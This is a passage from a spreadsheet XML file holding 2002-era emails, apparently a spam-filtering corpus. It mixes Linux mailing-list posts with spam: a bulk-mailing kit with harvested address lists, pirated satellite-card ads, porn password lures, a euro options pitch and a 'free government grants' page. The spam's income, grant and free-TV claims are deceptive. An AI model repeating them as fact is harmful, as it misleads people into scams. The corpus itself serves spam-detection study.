 vision of success, delete this now.  Life all comes down to a few
 opportunities - this is one of them. Have the courage to be free, and
 have the drive to reach your goals.  Before you start working with us,
 take 10 minutes and write down your personal goals.  What do you want
 in 5 years? 1 year? 6 months? Be realistic - set your goals high enough
 so you will work hard to reach them. Remember: You are the owner of your
 own destiny, make these goals become reality - only you know what needs
 to be done.
 You now possess the ideas, information, materials, and opportunity to
 become financially independent and reach your highest dreams.  I hope
 you come along for the ride, it's a wonderful world ahead.
 Copyright CashByNet 2000
 =================================================
 http://www.cashbynet.net
 The following message was sent to you as a valued webMillion member.
 If you wish to unsubscribe please click here:
 http://www.webmillion.com/remove_me.html?bl_id=9999
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Never pay for the goodz again (8SimUgQ)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --Boundary_(ID_57z4OPjIWZtVBINVV279ZQ)
 Content-type: text/html; charset=ISO-8859-1
 Content-transfer-encoding: QUOTED-PRINTABLE
 &lt;CENTER&gt;&lt;table border=3D1 cellspacing=3D0 cellpadding=3D2 width=3D500=
  bordercolor=3D#928CC6 bgcolor=3D#0A0A5A&gt;&lt;TR&gt;&lt;TD&gt;&lt;table border=3D0 ce=
 llspacing=3D0 cellpadding=3D2 width=3D490&gt;&lt;TR&gt;&lt;TD ALIGN=3Dcenter VALI=
 GN=3Dmiddle WIDTH=3D100% ql4HOr01&gt;&lt;a href=3Dhttp://www.freepornsecret=
 s.net/bnr/3010098220 target=3D_blank&gt;&lt;font color=3D#FFFF00 size=3D5 f=
 ace=3D"Arial, Verdana, Helvetica"&gt;&lt;strong&gt;GET FREE ACCESS TO X&amp;nbsp;X=
 &amp;nbsp;X&amp;nbsp;&lt;/strong&gt;&lt;/font&gt;&lt;BR 4qHTKe7&gt;&lt;IMG SRC=3Dhttp://pr%65view.=
 freepornsecrets.net/images/logoheader_02.jpg BORDER=3D0&gt;&lt;BR&gt;&lt;BR&gt;&lt;font=
  face=3D"Geneva, Arial, Helvetica, san-serif"&gt;&lt;strong&gt;&lt;font color=
 =3D"#FFFFFF" size=3D"6"&gt;GUARANTEED     &lt;font color=3D"#FFFF00"&gt;100% F=
 REE&lt;/font IDk2nKs&gt; PASSWORDS&lt;br&gt;    &lt;font color=3D"#FFFF00"&gt;GET INTO =
 PAYSITES FOR FREE&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;font color=3D"#FFFF00" size=
 =3D"6"&gt;!&lt;/font&gt;&lt;BR&gt;&lt;BR&gt;&lt;font color=3D#FFFF00 size=3D5 face=3D"Arial, =
 Verdana, Helvetica" VlQ&gt;Click Here to En&amp;#116er!&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD=
  ALIGN=3Dcenter VALIGN=3Dmiddle WIDTH=3D100%&gt;&lt;a href=3Dhttp://www.fre=
 epornsecre%74s.net/bnr/3010098220 ta.
 3YMLffs0V1go6Cnd
 --Boundary_(ID_57z4OPjIWZtVBINVV279ZQ)--
 _______________________________________________
 Crackmice mailing list
 Crackmice@crackmice.com
 http://crackmice.com/mailman/listinfo/crackmice
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Compiling for X
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Mmmph. You may actually need -L/usr/lib/X11 (or -L/usr/X11R6/lib) to
 &gt; make this work. I'm sure ld/gcc is smart enough to cope with out of
 &gt; order args.
 ld does not generally cope with out of order args by design.
 Nick
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Never pay eBay listing fees again!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I'm a college dropout.  I work about two hours a day.  
 I'm ambitious, but extremely lazy, and I make over 
 $250,000 a year.  Are you curious yet?
 In a minute I'm going to tell you my secret,
 it's the dirty little secret of the Internet ...
 You've probably heard stories about people making
 whopping huge money online, but you thought they 
 were the big corporate execs, famous programmers, or
 boy-geniuses.
 Well, grasshopper, think again ...
 It's people like you and me that are making the real
 money.  Yep, people like YOU AND ME!
 Ever since the "dot com bubble" burst in 1999, small-time
 entrepreneurs are getting richer while the Fortune 500 
 companies look for bankruptcy lawyers.
 Today small business owners and ordinary folks 
 like you and me can use the web to achieve complete 
 financial freedom with NO INVESTMENT and very little 
 work.  How?  By learning the most profitable marketing 
 technique ever created - it's called BULK EMAIL.
 If you've ever recieved an email advertisement, then 
 you know what bulk email is.  I bet you can't click on 
 DELETE fast enough for most of those ads, right?
 You might not want their product, but remember that 
 thousands of other folks probably do.  Bulk email is a 
 percentage game - every bulker who contacts you 
 makes a six figure income on the Internet.  I 
 guarantee it.  Now let's go back to Math 101 and 
 review some numbers ...
 If you sell on eBay, you pay anywhere from a few
 dollars to over a hundred dollars just to post one
 auction.  How many people see your ad?  Maybe a
 couple thousand or even ten or twenty thousand
 over a period of days.  Using bulk email, YOU CAN
 SEND YOUR AD TO MORE THAN A MILLION PEOPLE A DAY
 at virtually no cost.  Whether your send 100,000
 emails or 100 million emails, the price is the same.
 ZERO!
 Stop paying those outrageous auction listing fees when
 hardly anyone sees your ad!
 Imagine that you have a decent product with a 
 profit margin of $20.00 on each sale.  If you send 
 an email ad to 500,000 people, and only one person 
 in a thousand actually places an order, then you just 
 generated 500 orders and made $10,000 in a few hours 
 of work.  
 It's that simple ...
 All you have to do is convince ONE PERSON OUT OF A
 THOUSAND to buy your stuff and you're FILTHY RICH.
 The best thing is that anyone can do it.  Doesn't 
 matter if you're a nineteen-year-old college student 
 using a dorm-room computer or a fifty-year-old 
 executive working from an office building in New 
 York City.  Anyone, and I repeat ANYONE, can start 
 bulk emailing with virtually no startup costs.  All 
 it takes is a  few days of study, plenty of ambition, 
 and some basic familiarity with the Internet.
 I quit college when I was 19 to capitalize on the 
 "Dot Com" mania, and I've never looked back.  I 
 started with no money, no product to sell, and only 
 the most rudimentary computer skills.  I saw an 
 opportunity and I seized it.  A few years later, 
 I bought my own home - with CASH.  
 You don't need any money.  You don't need a product.
 You don't need to be a computer nerd and no experience
 whatsoever is required.  
 If you saw an employment ad in the newspaper like that
 you'd jump right on it.  It would be a dream come true.
 So what are you waiting for?!
 I'm going to ask you four simple questions.  If you answer
 YES to all of them, then I can almost promise that you
 will make at least $100,000 using bulk email this year.
 Here goes ...
 Do you have basic experience with the web? 
 Do you have a computer and an Internet connection?
 Do you have a few hours each day of free time?  
 Do you want to earn some extra money with an eye towards 
 complete financial freedom?  
 If you answer YES to these questions, you could be
 making $5,000 - $20,000 per week working from your 
 home.  Kiss your day job goodbye - this sure beats 
 the 9-5 daily grind!
 All you need is ambition and commitment.  This
 is no "get rich quick scheme".  You have to work
 to make big bucks, but ANYONE - and I mean ANYONE - can do 
 it.
 You're probably wondering if it's hard to get started.  
 Don't worry, it's not! I will show you step-by-step 
 how to start your first email campaign and how to
 build a booming online business.  You'll be generating 
 orders - AND MAKING MONEY - in less than seven days.
 Okay, so what if you don't have anything to sell?
 No problem!!  I'll show you where to find hot
 products that sell like CRAAAAAAZY! Most people delay
 starting an Internet business because they have 
 nothing to sell, but I'm removing that hurdle right now.  
 After reading the Bulkbook, you can build your complete 
 product line in less than two hours!  There is NO EXCUSE 
 not to get started! I will get you up-and-running within 
 seven days. In fact ...
 I personally guarantee that you will start your own 
 bulk email campaign less than a week after reading 
 the Bulkbook!  I'll give you a toll-free phone number 
 to reach me 24 hours a day, seven days a week; 
 where else will you find that level of service?!
 I will also include a step-by-step guide to starting 
 your very first email campaign called "Seven Days to 
 Bulk Email Success".  This seperate guide contains a daily 
 routine for you to follow with specific, exact 
 instructions on how to get started.  On day one, for 
 example, I teach you where to find a product to sell. 
 The next day you learn how to build a fresh mailing 
 list.  On the seventh day, you just click send!  Your 
 very first campaign is ready to go.
 As a special bonus, you'll recieve a FREE copy 
 of our STEALTH MASS MAILER, a very powerful bulk 
 email program which retails for $49.99! I'll even
 include 7 million email addresses absolutely FREE
 if you order NOW!
 Stop wasting your money on auction listing fees, 
 classifieds, and banner ads - they don't work, and 
 never will!  If you are SERIOUS about making money 
 on the Internet, bulk email is your only option.  
 What are you waiting for?  Few of us are willing 
 to share this knowledge, but I promise to teach 
 you everything I know about bulk emailing in this 
 extraordinary bulk emailer's handbook ... The Bulkbook! 
 Once again, here's the deal.  You give me $29.99.  
 I give you ALL THE TOOLS YOU NEED to become a
 successful, high profit bulk emailer.  INCLUDING:
 ** THE BULKBOOK
 Teaches you step-by-step how to become a high profit
 bulk emailer.  Secret techniques and tips never
 before revealed.
 ** SEVEN DAYS TO BULK EMAIL SUCCESS
 Provides detailed day-by-day instruction to start sending
 your first email campaign in seven days.
 ** 600 Email subjects that PULL LIKE CRAZY
 ** EMAIL LIST MANAGER
 Manage your email lists quickly and easily.  Very 
 user-friendly, yet powerful, software.
 ** STEALTH MASS MAILER
 Software can send up to 50,000 emails an hour automatically.
 Just load them in there and click SEND!
 ** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT
 Extracts email addresses from databases and search engines
 at speeds of over 200,000 per hour.
 ** WORLDCAST EMAIL VERIFIER
 Used to verify your email addresses that you extract to 
 make sure they're valid.
 ** EBOOK PUBLISHER
 Easily publish your own e-books and reports for resale using,
 you guessed it, bulk email!
 ** SEVEN MILLION EMAIL ADDRESSES
 This huge list will get you started bulking right away.
 I harvested these addresses myself, the list is filled
 with IMPULSE BUYERS ready to respond to your ads!
 If you added up all of the FULL VERSION BULK EMAIL software
 included with the BULKBOOK package, it would total over
 $499.  I am giving you the whole bundle for only $29.99.
 That means there is no other out-of-pocket startup expense
 for you.  Nothing else to buy, no reason to waste money on
 software that doesn't work.  With this one package, you get 
 EVERYTHING YOU NEED to START BULK EMAILING RIGHT AWAY.  
 Are you willing to invest $29.99 for the opportunity
 to make a SIX FIGURE INCOME on the Internet with no 
 startup cash and very little effort?
 Remember, you will recieve a toll-free phone number
 for 24 hour expert advice and consultation FROM ME
 PERSONALLY.
 To order the Bulkbook right now for only $29.99 with 
 a Visa or Mastercard, please click on the link below. 
 This will take you to our secure server for order 
 processing:
 http://cbphost.net/users/quiksilver/bulkbook.htm
 Note: The Bulkbook will be delivered electronically
 within 24 hours. It is not available in printed form. 
 ***********************************************************
 Our company is strictly opposed to unsolicited email.
 To be removed from this opt-in list, please send a 
 request to "bulkexpert@yahoo.com"
 ***********************************************************
 5906UuMo0-083oXzI3821cAvh4-032miqQ2111Hkix2-485El45
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: New gkrellm 2.0.0, gtk2 version
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002 19:14:54 +0200, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; Hi all,
 &gt; 
 &gt; I've repackaged the new gkrellm 2.0.0 which is now ported to gtk2
 &gt; (woohoo!). Unfortunately, the plugins are incompatible with the previous
 &gt; 1.2.x ones, and since not many/all have been ported yet, I prefer not to
 &gt; release the package on the main freshrpms.net site for now.
 &gt; 
 &gt; For those of you who'd like to try it out, you can grab it here :
 &gt; http://ftp.freshrpms.net/pub/freshrpms/testing/gkrellm/
 &gt; 
 &gt; I think the themes are still compatible, but haven't tried to install some
 &gt; with 2.0.0 yet.
 &gt; Last note, the above packages are for Valhalla. And yes, although GNOME 2
 &gt; is not in Valhalla, gtk2 and glib2 have been from the very beginning! ;-)
     Sweet, dude- I was really hoping it'd be out sooner or later; thanks a bunch!
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 I've been complaining for years, and almost no one listened. "Windows is
 just easier" you said. "I don't want to learn anything new", you said.
 Tell me how easy THIS is:
 http://www.guardian.co.uk/Archive/Article/0,4273,4477138,00.html
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Be Your Own Boss!!                         32140
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Deep-fried Twinkies take America by goo
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481504
 Date: Not supplied
 Carny concessionaires have taken to selling deep-friend Twinkies, doing big 
 business with artery-clogging horripilations: 
     In what may be the biggest setback for the war on fat since supersize 
     fries, Americans are scarfing down thousands of the gooey, calorie-laden 
     snack cakes at county fairs and restaurants across the country. 
     "We sold 26,000 Twinkies in 18 days. People drove for hours just to taste 
     our Twinkie," said Rocky Mullen, who sells the deep-fried, cream-filled 
     treats for $3 (U.S.) each at the Payallup Fair, 50 kilometres south of 
     Seattle. 
     As if Twinkies are not sweet enough already, vendors such as Mr. Mullen add 
     chocolate or berry sauce and sprinkle powdered sugar on top... 
     Hearing about Mr. Sell's invention, Hostess, the company that makes the 
     71-year-old snack, started promoting deep-fried Twinkies to state and 
     county fairs, where a captive population of junk-food addicts began 
     gobbling them up between pig races and tractor-pull competitions. 
     How bad are they for your health? After deep-frying, a Twinkie packs an 
     estimated 400 calories and 28 grams of fat.  
 Link[1] Discuss[2]
 [1] http://www.globeandmail.com/servlet/ArticleNews/PEstory/TGAM/20020923/UFATTN/Headlines/headdex/headdexInternational_temp/13/13/22/
 [2] http://www.quicktopic.com/boing/H/PyMFa6sCswPya
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] FWD (TLCB) Jimmy Carter: The Troubling, New Face of America
</t>
  </si>
  <si>
    <t xml:space="preserve">Of course, everyone knows that Owlman is a work of fuggin` genius
 J
 &gt; Hey, I met the wizard bloke from Owlman, who wants to touch me!!
 &gt; 
 &gt; Dave
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Al'Qaeda's fantasy ideology: Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I thought the mounds were along the southern Mississipi -- and the
 operating theory is that the diseases spread ahead of white explorers
 and got them before the whites even showed up.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Gary
 &gt; Lawrence Murphy
 &gt; Sent: Sunday, August 18, 2002 9:26 PM
 &gt; To: Robert Harley
 &gt; Cc: fork@spamassassin.taint.org
 &gt; Subject: Re: Al'Qaeda's fantasy ideology: Policy Review no. 114
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt; "R" == Robert Harley &lt;harley@argote.ch&gt; writes:
 &gt; 
 &gt;     R&gt; Well IIRC, Cortez arrived in 1519, and DeSoto was born circa
 &gt;     R&gt; 1500.  You do the math.
 &gt; 
 &gt; Ah, I suppose so. If it wasn't DeSoto ... then who was it that landed
 &gt; in Southern Florida to be greeted by great cities of millions of
 &gt; mound-dwellers who had completely vanished by the time Cortez arrived
 &gt; to kill as many as he could?
 &gt; 
 &gt; --
 &gt; Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications
 Inc
 &gt;  Business Advantage through Community Software :
 http://www.teledyn.com
 &gt; "Computers are useless.  They can only give you answers."(Pablo
 Picasso)
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] nmap results
</t>
  </si>
  <si>
    <t xml:space="preserve">As far as I can remember, the fact that the IPID is zero was introduced into
 2.4 was to introduce correct behaviour, i.e. in the case where it is not
 needed, it is set to zero.  This was discussed on bugtraq a while
 ago....lemme see...
 http://cert.uni-stuttgart.de/archive/bugtraq/2002/03/msg00372.html shows a
 message from nmap's author on the subject.  The only thing having IPID==0
 achieves is that you have one more criteria on which to base your OS
 fingerprint which isn't really much of a problem to be honest.
 Stop worrying about it :)
 Cheers,
 jr
 ----- Original Message -----
 From: "Paul O'Neil" &lt;poneil@dbiassociates.net&gt;
 To: &lt;ilug@linux.ie&gt;
 Sent: Monday, July 22, 2002 1:50 PM
 Subject: [ILUG] nmap results
 &gt; I had posted previously about the 2.4 kernel using iptables I ran nmap
 &gt; against. The IPID sequence generation was all zeros. Someone said this was
 &gt; indicative of earlier kernels but was fixed about 2.4.5 version. Since I'm
 &gt; running the latest what is causing this? I ran nmap against a 2.2 kernel
 &gt; using chains and it had better results than the stock 2.4 kernel.
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 information.
 &gt; List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: Can't use and undefined value.." error
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Date: Mon, 30 Sep 2002 14:00:12 -0400 (EDT)
 &gt; From: Dayv Gastonguay &lt;noghri@nauticom.net&gt;
 &gt;
 &gt; I just installed razor 2.152 on a FreeBSD 4.4-RELEASE box and having
 &gt; problems with razor-check.  Any time razor-check is run, (with or without
 &gt; arguments), i get this error:
 &gt;
 &gt; Can't use an undefined value as a symbol reference at
 &gt; /usr/local/lib/perl5/site_perl/5.005/i386-freebsd/Razor2/Client/Agent.pm
 &gt; line 756.
 &gt;
  Try installing the latest Perl (at least 5.6.1) port on Freebsd and make
 sure you set the system to use perl from ports (i.e. in the
 ports/lang/perl5/files directory run ./use.perl port. Reinstall the relevant
 perl modules needed by razor and try again.
 Sven
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tired of paying big bucks for cable
</t>
  </si>
  <si>
    <t xml:space="preserve">Tired of paying big bucks for satellite t.v.?
 THEN DONT!
 For as low as $97 you can buy the programming card that will
 give you all the channels.  YES ALL OF THEM, including pay channels
 and pay per view.  You will never have another satellite or cable bill
 again.  
 http://11.lspeedhost.net/zzzzcards/ads
 FOR AS LITTLE AS $97 YOU NOW GOT A WORKING UNBLOCKED RECEIVER WITH 
 ALL CHANNELS !!! 60+ movie channels 20+ PRON CHANNELS ,etc.. ALL THE 
 CHANNELS ARE UNLOCKED!!! INCLUDING ALL PAY PER VIEW AND EVENTS FOR 
 FREE!  FOR LIFE!
 http://11.lspeedhost.net/zzzzcards/ads
 5963HgYk7-980lnZG6754dLNm8-294DcnP4174Lcsd2-914QRTr7194Fyjl55
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] What to do when the stock market is down 0179mFrP5-640z-13
</t>
  </si>
  <si>
    <t xml:space="preserve">On January 1st 2002, the European countries began
 using the new Euro.  Never before have so
 many countries with such powerful economies united
 to use a single currency.  Get your piece of history
 now!  We would like to send you a FREE Euro
 and a FREE report on world currency.  Just visit
 our site to request your Euro and Euro report:
 http://80.71.65.57/
 In addition to our currency report, you can receive
 our FREE INVESTMENT PACKAGE:
 *Learn how $10,000 in options will leverage $1,000,000 in
 Euro Currency. This means even a small movement in the market
 has huge profit potential.
 If you are over age 18 and have some risk capital, it's
 important that you find out how the Euro will
 change the economic world and how you can profit!
 $10,000 minimum investment
 Please carefully evaluate your financial position before
 trading.  Only risk capital should be used.
 http://80.71.65.57/
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 To "Opt-Out":
 http://80.71.65.57/optout.html
 9890mZai1-220dXGN8995pTZf7-668SKMW1903wjsu2-604meTh8297QskO2-l57
 1733PuSv2-985DSia7345xFCG6-061JUXO3729AvSA0-582gDoL8437inQv9-747IFpX8534GdaJ0-l73
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 11 Sep 2002, Gary Lawrence Murphy wrote:
 &gt; So then why does my webhost _still_ only give me 200MB?
 Because ~10 krpm server SCSII doesn't follow the curve. Most rackspace is
 ridiculously expensive/unit, so people don't use low end EIDE hardware 
 there.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: Archer-UK TV Alert
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Its possibly a different Shauna Lowery: The one I'm talking about 
 is 
 &gt; about 7 foot tall and presents "Animal Hospital" or something like 
 &gt; that.
 &gt; tim h
 Oh, and I'm less than 7 foot tall, so it would be her who had to 
 kneel down
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Government grants you $25,000!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
